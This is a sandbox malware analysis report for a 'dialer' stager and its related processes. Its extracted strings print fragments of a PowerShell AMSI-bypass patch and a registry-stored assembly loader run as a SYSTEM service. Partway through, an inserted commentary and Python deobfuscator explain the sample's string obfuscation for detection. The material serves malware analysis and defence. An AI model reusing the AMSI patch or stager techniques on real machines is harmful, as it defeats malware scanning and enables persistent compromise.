                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: ececdefe1ac0b5236df46aa0fea75aee35ab016135187b54f502e1ef08d528dd
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 2A51AF3630478182F7789A2FA6E87ABAB91F785B80F480025DF5913F99DA39C484CF40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: e3632cf0faa2884abe8bef25ae3ee24f3f2ff5deabc5a44064bd619f37204a38
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: EC617751D25F488DD563AF3D95EE33767187FA63C5F42D307EA8A71A61DB3894838200
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                   • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 452eb158713b319a55f3bd794e444267236df8f4f9927895fcbc57923c6a53ab
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: C141E433314A5082DB30CF2AE5887AA77A1F398794F814021EF4D87B94DB7CD481CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                   • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: 6eabd3e355e5b67f48db9442ae7b3dc10682e2ed0e11ffff51a4f034c56f9e24
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: A911FE32215B8482EB618F1AE64435A7BE5F788F94F584225DF9D07B68DF3DC5918B00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: e2c22169e998d8ebacdb75025f40579bb88f2a2d899cdad298ac28063eea38fe
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 98E08661A41B44D0DF029F26E5D82D833A0DB58B54F899122DA9C06315FA3CD1E9C301
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: a6216ee66644fc5ab5c7b77e7fa4c42cdb7eeced81df860a1891822be9313c50
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: D9E08661A41B44C0DF029F25D5D41983360E758B54F899122DA9C06315EA3CD1E5C300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 100149682c65cb0ab3353a091d46fbbfb1404d811749275f367980b11ed6bdd1
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 37D06722A21A84A5EE11FB08D9DD38A6374F394309F954411928D41975DF39CA8AC741
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                   • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: edcad32d81738ade1f73171f2d87282f723bab7b196b67cd984df772c48bc63b
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: 17116D35B01B9081EA64CB6BA54C21A6BA1F789FD0F5D4128DF4D93B25DF38D482C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                   • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 5d9185cc83e4cce889635d7ef653d7873b9f71e7106c0078a62238e334c61d6e
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 40E06531B01A2086E7288FA7D84C349BBE1FB88F0AF08C024CA0907761DF7D94D98B80
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                   • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: e984cb40b47b579263da4e65cd5ebbc8b440a42ac7779754c188b35efbbd470c
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: 1CE0E571711A6086E7289B67D94C259BBA1FB88B16F488024CA1907B21EF38A4D98A10
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.1757680887.00007FF703781000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF703780000, based on PE: true
                                                                   • Associated: 00000026.00000002.1757659925.00007FF703780000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000026.00000002.1757711193.00007FF70378C000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000026.00000002.1757738267.00007FF70378F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000026.00000002.1758159836.00007FF703A08000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000026.00000002.1758492789.00007FF703C7F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000026.00000002.1758576281.00007FF703CB8000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff703780000_weiuemyrzjra.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction ID: 969fed1e4abdcc93504c53b4d2f275ba38e423981d955325edb4edaf05f1ad95
                                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction Fuzzy Hash: 6EB09230D4420A84E2423B01AC81258A2606F0CB80FD02020C40C22352CB6D50414B30

                                                                  Execution Graph

                                                                  Execution Coverage:76.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:96
                                                                  Total number of Limit Nodes:1
                                                                   execution_graph (node id, block address, APIs called in that block, successor nodes):
                                                                   190 140001970 -> 193
                                                                   193 140001984 FindResourceExA -> 194, 195
                                                                   194 140001979 ExitProcess
                                                                   195 1400019ae SizeofResource -> 194, 196
                                                                   196 1400019c3 LoadResource -> 194, 197
                                                                   197 1400019d7 LockResource RegOpenKeyExW -> 194, 198
                                                                   198 140001a0e RegSetValueExW -> 194, 199
                                                                   199 140001a34 -> 209
                                                                   203 140001a48 -> 204
                                                                   204 1400017ec (9 API calls) -> 205
                                                                   205 140001a57 -> 252
                                                                   207 140001a62 -> 194, 262
                                                                   209 140001a7c GetProcessHeap HeapAlloc StrCpyW -> 272
                                                                   212 140001b05 StrCatW StrCatW -> 275
                                                                   213 140001ad5 StrCatW StrCatW StrCatW -> 212
                                                                   218 140001c0c (6 API calls) -> 219
                                                                   219 140001b4b -> 220
                                                                   220 140001c0c (6 API calls) -> 221
                                                                   221 140001b5a -> 222
                                                                   222 140001c0c (6 API calls) -> 223
                                                                   223 140001b69 -> 224
                                                                   224 140001c0c (6 API calls) -> 225
                                                                   225 140001b78 -> 226
                                                                   226 140001c0c (6 API calls) -> 227
                                                                   227 140001b87 -> 228
                                                                   228 140001c0c (6 API calls) -> 229
                                                                   229 140001b96 -> 230
                                                                   230 140001c0c (6 API calls) -> 231
                                                                   231 140001ba5 -> 232
                                                                   232 140001c0c (6 API calls) -> 233
                                                                   233 140001bb4 -> 234
                                                                   234 140001c0c (6 API calls) -> 235
                                                                   235 140001bc3 -> 236
                                                                   236 140001c0c (6 API calls) -> 237
                                                                   237 140001bd2 -> 238
                                                                   238 140001c0c (6 API calls) -> 239
                                                                   239 140001be1 -> 240
                                                                   240 140001c0c (6 API calls) -> 241
                                                                   241 140001bf0 -> 242
                                                                   242 140001c0c (6 API calls) -> 243
                                                                   243 140001a39 -> 244
                                                                   244 1400017ec SysAllocString SysAllocString CoInitializeEx -> 245, 246
                                                                   245 140001948 SysFreeString SysFreeString -> 203
                                                                   246 14000182d CoInitializeSecurity -> 247, 248
                                                                   247 140001875 CoCreateInstance -> 249, 250
                                                                   248 140001869 -> 247, 249
                                                                   249 140001942 CoUninitialize -> 245
                                                                   250 1400018a4 VariantInit -> 251
                                                                   251 1400018fa -> 249
                                                                   252 14000117c (7 API calls) -> 253, 254
                                                                   253 14000120e CoInitializeSecurity -> 255, 256
                                                                   254 1400015c0 (6 API calls) -> 207
                                                                   255 140001256 CoCreateInstance -> 257, 258
                                                                   256 14000124a -> 255, 257
                                                                   257 1400015ba CoUninitialize -> 254
                                                                   258 140001287 VariantInit -> 260
                                                                   259 140001537 -> 257
                                                                   260 1400012de -> 259, 261
                                                                   261 140001489 VariantInit VariantInit VariantInit -> 259
                                                                   262 140001614 SysAllocString SysAllocString CoInitializeEx -> 263, 264
                                                                   263 1400017c5 SysFreeString SysFreeString -> 194
                                                                   264 140001655 CoInitializeSecurity -> 265, 266
                                                                   265 140001691 -> 266, 267
                                                                   266 14000169d CoCreateInstance -> 267, 268
                                                                   267 1400017bf CoUninitialize -> 263
                                                                   268 1400016cc VariantInit -> 269
                                                                   269 140001722 -> 270, 271
                                                                   270 14000175c VariantInit -> 271
                                                                   271 14000178e -> 267
                                                                   272 14000114c GetModuleHandleA -> 273, 274
                                                                   273 140001174 -> 212, 213
                                                                   274 140001167 GetProcAddress -> 273
                                                                   275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc -> 296
                                                                   278 140001b2d -> 289
                                                                   279 140001d0d StrStrIW -> 280, 284
                                                                   280 140001f21 (6 API calls) -> 278
                                                                   281 140001d2f StrStrIW StrNCatW StrCatW -> 282, 284
                                                                   282 140001edf StrCatW StrStrIW -> 281, 283
                                                                   283 140001f19 -> 280
                                                                   284 140001d2c -> 281, 282, 285, 286, 288
                                                                   285 140001ebf StrCatW -> 284
                                                                   286 140001e82 StrCatW StrNCatW -> 287
                                                                   287 140001eae StrCatW -> 285
                                                                   288 140001e5a StrCatW StrCatW -> 287
                                                                   289 140001c0c lstrlenW -> 299
                                                                   291 140001c45 -> 292, 293
                                                                   292 140001c49 StrStrIW -> 293, 294
                                                                   293 140001b3c -> 218
                                                                   294 140001c5a -> 295
                                                                   295 140001c5d StrStrIW -> 293, 295
                                                                   296 140001000 CryptAcquireContextW -> 297, 298
                                                                   297 140001039 CryptGenRandom CryptReleaseContext -> 298
                                                                   298 14000105e -> 278, 279
                                                                   299 140001070 -> 300
                                                                   300 140001000 (3 API calls) -> 301
                                                                   301 1400010ea -> 291, 301

                                                                  Callgraph

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                   • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 1815803762-291530887
                                                                  • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                                  • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                   • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                  • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                                  • API String ID: 3510167801-2888743547
                                                                  • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                                  • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300
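The API and string combination of this function (GetProcessHeap/HeapAlloc plus CryptAcquireContextW/CryptGenRandom, with the fragments `'+'`, `'+[Char](` and `)+'`) is the dialer stager's command-line obfuscator: it evidently splits a PowerShell string at random positions and rewrites random characters as `[Char](N)` casts, which is what the "Potential PowerShell Command Line Obfuscation" Sigma hit keys on. The two `gfff` strings are the little-endian bytes of 0x66666667, the multiplier compilers emit for integer division by 10, which fits rendering the random character code as decimal digits. The following is an added example, not code from the page or from the sample, that folds such a command line back into plain literals and counts the indicators a detection would use. The obfuscated command line it parses is constructed to follow those fragment templates; the sample's actual generator output is not on the page, and the scoring thresholds are assumptions.

```python
"""Fold PowerShell string-concatenation obfuscation ('a'+[Char](98)+'c') back into
plain literals and count the indicators a detection rule would key on."""
import re

# One fragment: a single-quoted literal ('' is the escaped quote) or a [Char](N) cast.
_FRAG_PAT = r"'(?:[^']|'')*'|\[char\]\(\d+\)"
_FRAG = re.compile(r"'((?:[^']|'')*)'|\[char\]\((\d+)\)", re.IGNORECASE)
# A run: two or more fragments joined by '+', with optional whitespace around the '+'.
_RUN = re.compile(rf"(?:{_FRAG_PAT})(?:\s*\+\s*(?:{_FRAG_PAT}))+", re.IGNORECASE)


def fold_run(run):
    """Concatenate the fragments of one run. Returns (text, char_casts, joins)."""
    parts, casts = [], 0
    for m in _FRAG.finditer(run):
        if m.group(2) is not None:            # [Char](N)
            parts.append(chr(int(m.group(2))))
            casts += 1
        else:                                  # 'literal'
            parts.append(m.group(1).replace("''", "'"))
    return "".join(parts), casts, len(parts) - 1


def deobfuscate(cmdline):
    """Replace every concatenation run in cmdline with one quoted literal.

    Returns (cleaned_cmdline, stats); stats counts runs, [Char] casts and '+' joins.
    """
    stats = {"runs": 0, "char_casts": 0, "joins": 0}

    def repl(m):
        text, casts, joins = fold_run(m.group(0))
        stats["runs"] += 1
        stats["char_casts"] += casts
        stats["joins"] += joins
        return "'" + text.replace("'", "''") + "'"

    return _RUN.sub(repl, cmdline), stats


def looks_obfuscated(stats, min_casts=1, min_joins=4):
    """Crude scoring: any [Char] cast, or many joins, is worth a look.
    The thresholds are assumptions, not values from the sample or the Sigma rule."""
    return stats["char_casts"] >= min_casts or stats["joins"] >= min_joins


# Constructed command lines following the fragment templates in the strings above.
SAMPLE_OBFUSCATED = ("powershell.exe -nop -w hidden -c "
                     "\"IEX('Get-Pr'+[Char](111)+'cess -Na'+'me ex'+[Char](112)+'lorer')\"")
SAMPLE_PLAIN = "powershell.exe -c \"Get-Process -Name explorer\""

if __name__ == "__main__":
    for line in (SAMPLE_OBFUSCATED, SAMPLE_PLAIN):
        clean, stats = deobfuscate(line)
        print(looks_obfuscated(stats), stats, clean)
```

Because the generator emits its fragments on either side of a `+`, the whole run is recovered by the one `_RUN` pattern regardless of how many split points or casts it contains; a command line that never concatenates is left untouched and scores zero.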

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                   • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                                  • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                  • API String ID: 3242894177-3709903795
                                                                  • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                                  • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                                  • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
• String ID: SYSTEM$dialersvc64$powershell
• API String ID: 3960698109-174983134
• Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
• Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
• Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
• Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
• String ID: dialersvc64
• API String ID: 2407135876-3881820561
• Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
• Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
• Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
• Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340

Control-flow Graph

APIs
• FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
• SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
• LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
• LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
• RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
  • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
  • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
  • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
  • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
  • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
  • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
  • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
  • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
  • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
